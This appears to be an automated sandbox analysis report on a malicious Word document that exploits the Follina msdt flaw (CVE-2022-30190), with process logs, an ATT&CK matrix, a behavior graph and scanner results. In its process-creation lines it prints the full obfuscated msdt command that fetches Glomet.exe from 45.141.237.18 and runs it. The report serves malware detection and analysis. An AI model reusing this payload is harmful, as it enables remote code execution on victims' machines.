      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\ProgramData\Glomet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\ProgramData\Glomet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\ProgramData\Glomet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\ProgramData\Glomet.exeDropped PE file which has not been started: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\GENOPBYGGEDE\Intraretinal\Tilstningsfries\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ea13q231\ea13q231.dllJump to dropped file
      Source: C:\ProgramData\Glomet.exeDropped PE file which has not been started: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\REDO\DYSMENORRHEIC\Tidehead7\Kartonens\MsMpRes.dllJump to dropped file
      Source: C:\ProgramData\Glomet.exeDropped PE file which has not been started: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Fns\differentieringerne\PHOTOCOMPOSE\serpigoes\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
      Source: C:\ProgramData\Glomet.exeDropped PE file which has not been started: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Redbones\libmpdec-2.dllJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\llhoph4d\llhoph4d.dllJump to dropped file
      Source: C:\ProgramData\Glomet.exeDropped PE file which has not been started: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Strawberries\MOLAKKORD\SetEHCIKey.exeJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\q0vyiohn\q0vyiohn.dllJump to dropped file
      Source: C:\Windows\SysWOW64\msdt.exeWindow / User API: threadDelayed 1567Jump to behavior
      Source: C:\ProgramData\Glomet.exeCode function: 29_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,29_2_00405A19
      Source: C:\ProgramData\Glomet.exeCode function: 29_2_004065CE FindFirstFileA,FindClose,29_2_004065CE
      Source: C:\ProgramData\Glomet.exeCode function: 29_2_004027AA FindFirstFileA,29_2_004027AA
      Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
      Source: C:\ProgramData\Glomet.exeAPI call chain: ExitProcess graph end nodegraph_29-3243
      Source: C:\ProgramData\Glomet.exeAPI call chain: ExitProcess graph end nodegraph_29-3394
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aWV4IChuZXctb2JqZWN0IHN5c3RlbS5uZXQud2ViY2xpZW50KS5kb3dubG9hZGZpbGUoImh0dHA6Ly80NS4xNDEuMjM3LjE4L0dsb21ldC5leGUiLCJjOlxwcm9ncmFtZGF0YVxHbG9tZXQuZXhlIik7U3RhcnQtUHJvY2VzcyAiYzpccHJvZ3JhbWRhdGFcR2xvbWV0LmV4ZSI='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aWV4IChuZXctb2JqZWN0IHN5c3RlbS5uZXQud2ViY2xpZW50KS5kb3dubG9hZGZpbGUoImh0dHA6Ly80NS4xNDEuMjM3LjE4L0dsb21ldC5leGUiLCJjOlxwcm9ncmFtZGF0YVxHbG9tZXQuZXhlIik7U3RhcnQtUHJvY2VzcyAiYzpccHJvZ3JhbWRhdGFcR2xvbWV0LmV4ZSI='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTOJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES216A.tmp" "c:\Users\user\AppData\Local\Temp\q0vyiohn\CSC14339BC3D3E94BA0AEA5453DEFD3E9E.TMP"Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3EE5.tmp" "c:\Users\user\AppData\Local\Temp\ea13q231\CSCF24C6B632D84EA4B9FDE29780CB1444.TMP"Jump to behavior
      Source: C:\ProgramData\Glomet.exeProcess created: C:\Windows\SysWOW64\cmd.exe CMD.EXE /C SET /A "0x00^75"Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDEDE.tmp" "c:\Users\user\AppData\Local\Temp\llhoph4d\CSCA6DEB1F21B847AF87589FE9AEBF81D1.TMP"Jump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\msdt.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\ProgramData\Glomet.exeCode function: 29_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,29_2_004033B3

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts11
      Command and Scripting Interpreter      		1
      Windows Service      		1
      Access Token Manipulation      		11
      Masquerading      		OS Credential Dumping1
      Query Registry      		Remote Services1
      Archive Collected Data      		Exfiltration Over Other Network Medium1
      Encrypted Channel      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
      System Shutdown/Reboot
      Default Accounts12
      Exploitation for Client Execution      		1
      DLL Side-Loading      		1
      Windows Service      		1
      Disable or Modify Tools      		LSASS Memory1
      Virtualization/Sandbox Evasion      		Remote Desktop Protocol1
      Clipboard Data      		Exfiltration Over Bluetooth14
      Ingress Tool Transfer      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)11
      Process Injection      		1
      Virtualization/Sandbox Evasion      		Security Account Manager1
      Application Window Discovery      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
      Non-Application Layer Protocol      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)1
      DLL Side-Loading      		1
      Access Token Manipulation      		NTDS1
      Remote System Discovery      		Distributed Component Object ModelInput CaptureScheduled Transfer23
      Application Layer Protocol      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon Script1
      Extra Window Memory Injection      		11
      Process Injection      		LSA Secrets3
      File and Directory Discovery      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common1
      Deobfuscate/Decode Files or Information      		Cached Domain Credentials15
      System Information Discovery      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
      Timestomp      		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
      DLL Side-Loading      		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
      Extra Window Memory Injection      		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 665041 Sample: 20220714 DWG.doc Startdate: 15/07/2022 Architecture: WINDOWS Score: 72 59 Multi AV Scanner detection for submitted file 2->59 61 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->61 63 Yara detected Microsoft Office Exploit Follina CVE-2022-30190 2->63 65 Document exploit detected (process start blacklist hit) 2->65 7 Glomet.exe 4 57 2->7         started        11 WINWORD.EXE 67 67 2->11         started        14 csc.exe 3 2->14         started        16 2 other processes 2->16 process3 dnsIp4 39 C:\Users\user\Pictures\...\SetEHCIKey.exe, PE32 7->39 dropped 41 C:\Users\user\Pictures\...\libmpdec-2.dll, PE32+ 7->41 dropped 43 C:\Users\user\Pictures\...\MsMpRes.dll, PE32+ 7->43 dropped 53 3 other files (none is malicious) 7->53 dropped 67 Obfuscated command line found 7->67 18 cmd.exe 1 7->18         started        55 45.141.237.18, 49743, 49744, 49766 SPECTRAIPSpectraIPBVNL Netherlands 11->55 57 192.168.2.1 unknown unknown 11->57 45 C:\Users\user\...\20220714 DWG.doc.LNK, MS 11->45 dropped 20 msdt.exe 21 11->20         started        23 splwow64.exe 11->23         started        25 MSOSYNC.EXE 5 12 11->25         started        47 C:\Users\user\AppData\Local\...\llhoph4d.dll, PE32 14->47 dropped 27 cvtres.exe 1 14->27         started        49 C:\Users\user\AppData\Local\...\q0vyiohn.dll, PE32 16->49 dropped 51 C:\Users\user\AppData\Local\...\ea13q231.dll, PE32 16->51 dropped 29 cvtres.exe 1 16->29         started        31 cvtres.exe 1 16->31         started        file5 signatures6 process7 file8 33 conhost.exe 18->33         started        35 C:\Windows\Temp\...\DiagPackage.dll.mui, PE32 20->35 dropped 37 C:\Windows\Temp\...\DiagPackage.dll, PE32+ 20->37 dropped process9

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      20220714 DWG.doc8%VirustotalBrowse
      20220714 DWG.doc5%ReversingLabs

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll0%ReversingLabs
      C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Fns\differentieringerne\PHOTOCOMPOSE\serpigoes\api-ms-win-core-timezone-l1-1-0.dll0%MetadefenderBrowse
      C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Fns\differentieringerne\PHOTOCOMPOSE\serpigoes\api-ms-win-core-timezone-l1-1-0.dll0%ReversingLabs
      C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\GENOPBYGGEDE\Intraretinal\Tilstningsfries\api-ms-win-crt-stdio-l1-1-0.dll0%MetadefenderBrowse
      C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\GENOPBYGGEDE\Intraretinal\Tilstningsfries\api-ms-win-crt-stdio-l1-1-0.dll0%ReversingLabs
      C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\REDO\DYSMENORRHEIC\Tidehead7\Kartonens\MsMpRes.dll0%MetadefenderBrowse
      C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\REDO\DYSMENORRHEIC\Tidehead7\Kartonens\MsMpRes.dll0%ReversingLabs
      C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Redbones\libmpdec-2.dll0%MetadefenderBrowse
      C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Redbones\libmpdec-2.dll0%ReversingLabs
      C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Strawberries\MOLAKKORD\SetEHCIKey.exe3%MetadefenderBrowse
      C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Strawberries\MOLAKKORD\SetEHCIKey.exe0%ReversingLabs

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      29.2.Glomet.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
      29.0.Glomet.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://45.141.237.18/icons/ubuntu-logo.png0%Avira URL Cloudsafe
      https://roaming.edog.0%URL Reputationsafe
      https://cdn.entity.0%URL Reputationsafe
      https://powerlift.acompli.net0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://cortana.ai0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
      http://45.141.237.18/Glomet.html0%Avira URL Cloudsafe
      https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
      https://officeci.azurewebsites.net/api/0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://api.aadrm.com0%URL Reputationsafe
      https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://dataservice.o365filtering.com/0%URL Reputationsafe
      https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
      https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
      https://ncus.contentsync.0%URL Reputationsafe
      https://apis.live.net/v5.0/0%URL Reputationsafe
      https://wus2.contentsync.0%URL Reputationsafe
      https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://45.141.237.18/icons/ubuntu-logo.pngfalse
      • Avira URL Cloud: safe
      		unknown
      http://45.141.237.18/Glomet.htmlfalse
      • Avira URL Cloud: safe
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://api.diagnosticssdf.office.comFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
        		high
        https://login.microsoftonline.com/FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
          		high
